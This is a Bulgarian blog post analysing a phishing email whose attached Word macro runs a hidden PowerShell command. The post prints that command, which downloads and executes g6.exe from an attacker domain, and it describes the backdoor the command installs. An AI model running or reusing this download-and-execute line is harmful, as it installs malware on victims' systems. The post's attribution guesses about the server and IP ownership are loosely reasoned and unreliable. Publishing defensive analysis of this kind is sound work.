Посоченият в заглавието файл е от фишинг мейл с прикачен файл. Това не е новост, но за първи път ще публикувам анализ на нещо подобно.
На снимката по-горе се вижда мейлът, с който се разпространява зловредният файл. Самият e-mail, „от който идва“, си е съвсем истински, също като домейнът. Ако отворите „milenbazinski.com“, ще се зареди сайтът на ЧСИ Милен Бъзински.
Данни от мейла
Според мета данните, изпращачът е „office@milenbazinski.com“, но сървърът, от който е получено съобщението, е „blue.gkostov.com“ с IP адрес 168.119.162.24. Справка показва, че „gkostov.com“ се хоства на различни от посочения адреси, собственост на компанията Cloudflare:
host gkostov.com
gkostov.com has address 104.21.66.110
gkostov.com has address 172.67.159.114
А използваният за изпращане адрес е частно IP в Германия. Към момента на писане на публикацията на този адрес работи Apache2 Debian сървър, срещан най-често в Liunx базираните системи, използвани за одит на киберсигурността и хакерстване, като Kali Linux и Parrot OS.
За да не размивам публикацията, предоставям линк към текстови файл с whois информация за IP 168.119.162.24 към 7-ми април 2021г. whois_168_119_162_24.
Анализ на файла Izp.list021011357.doc
Izp.list021011357.doc е Word документ в стандарта doc 2003 – 2007 с включен макрос в него. По принцип, в по-новите системи те са забранени по подразбиране. Принципите са хубаво нещо, но аз се сещам за поне 3 институции, където те са разрешени и макросът би се изпълнил без предупреждение.
Макрос
Макросът е неразбираем за човек без опит. Основното в него е ред 15. Той съдържа криптирана команда, която се изпълнява чрез cmd.exe.
powershell.exe -executionpolicy bypass -W Hidden -command
(new-object System.Net.WebClient).DownloadFile(‘http://sev.milenbazinski.me:2095/ref/g6.exe’,$env:Temp+’\rr.exe’);
(New-Object -com Shell.Application).ShellExecute($env:Temp+’\rr.exe’)
На кратко:
- Стартира се скрит прозорец PowerShell
- Сваля се файлът „g6.exe“ от ‘http://sev.milenbazinski.me:2095/ref/g6.exe’ и се запазва в Temp директорията на потребителя като „rr.exe“
- Стартира „rr.exe“
Проверка на „milenbazinski.me“ сочи, че сайтът се хоства на IP адрес „49.12.44.116“, който е предоставен от компания APNIC, търгуваща на адреси за азиатския пасифик. Самият адрес е задънена улица, защото е виртуален и не води до физическа локация, а получаването на информация за собственика е малко вероятно.
Информация за „49.12.44.116“ към 7-ми април 2021г.: whois_49_12_44_116
Тук е важно да отбележим две неща:
- „sev.milenbazinski.me“ не е „milenbazinski.com“. Това е съвсем различен домейн в различна зона, „me“ вместо „com“. Т.е. зловредният файл не се сваля от сайта на ЧСИ-то, а от друг сайт.
- За IP „49.12.44.116“ е платено, вероятно с кредитна карта, която си има конкретен собственик. Възможно е данните за картата да са откраднати, но също е възможно самият хакер да е платил със собствената си карта.
Сваленото и стартирано rr.exe
Файлът се идентифицира като „PromSoft_update.exe“, собственост на фирма „PromSoft Ltd“, българска компания за счетоводен софтуер. Самата компания също е жертва и няма нищо общо с произхода на зловредния софтуер.
Приложението има простичка задача – да разпъне „fers.exe“ в профила на потребителя и да го интегрира в системата като стандартен Windows процес.
Заедно с „fers.exe“ се разопакова и ключ и модул за шифроване.
Fers.exe
Новоразпънатото приложение носи същия отпечатък като „rr.exe“. Това означава, че двете са създадени на една и съща система от конкретен потребител. Самото приложение се категоризира като „Backdoor“ или „троянски кон“. Целта е да осигури постоянен достъп на хакера до системата. Наличието на ключ и модул за шифриране говори, че вероятно ще бъде използвано и за криптиране на системата.
Интегрирано в Windows-а като процес, „fers.exe“ ще се стартира всеки път автоматично и незабележимо, което ще гарантира достъпа на хакера, давайки му администраторски права.
Заключение
Направеният анализ дава достатъчно данни, за да се разбере кой е хакерът. Не е ясно дали е потребител от Германия с IP „168.119.162.24“ или това ще се окаже поредната брънка, но е достатъчно за проверка. Важно е да се провери и кой е заплатил за виртуалното IP на „APNIC“. Ако се окаже, че лицето, ползвател на IP „168.119.162.24“ е заплатило за виртуалния адрес или пък плащането е извършено от неговото IP, тогава всичко ще е ясно. Тук простата аритметика ще свърши работа, 2 и 2 винаги прави 4. Разбира се, по-нататъшни действия са работа на разследващите органи.
За самия хак са вложени доста усилия, но от един човек. Уърдовският файл е бил модифициран, вероятно от предишен такъв с подобна цел. Всички мета данни са изтрити, за да не водят до конкретен собственик. Основна цел на хакера са стари и занемарени системи, които не се поддържат. След (зло)употребата им по преценка на хакера, това може да включва източване на сметки и лични данни, вероятно ще бъдат криптирани, а потребителите им – рекетирани. Вероятността да бъдат декриптирани след плащане е малка. Затова не плащайте и не преговаряйте с терористи.
Към момента на писане на тази публикация „http://sev.milenbazinski.me:2095/ref/g6.exe“ вече е недостъпно, но все пак, не се опитвайте да го отворите. Успешното зареждане може да е опасно за вашия компютър и банкова сметка.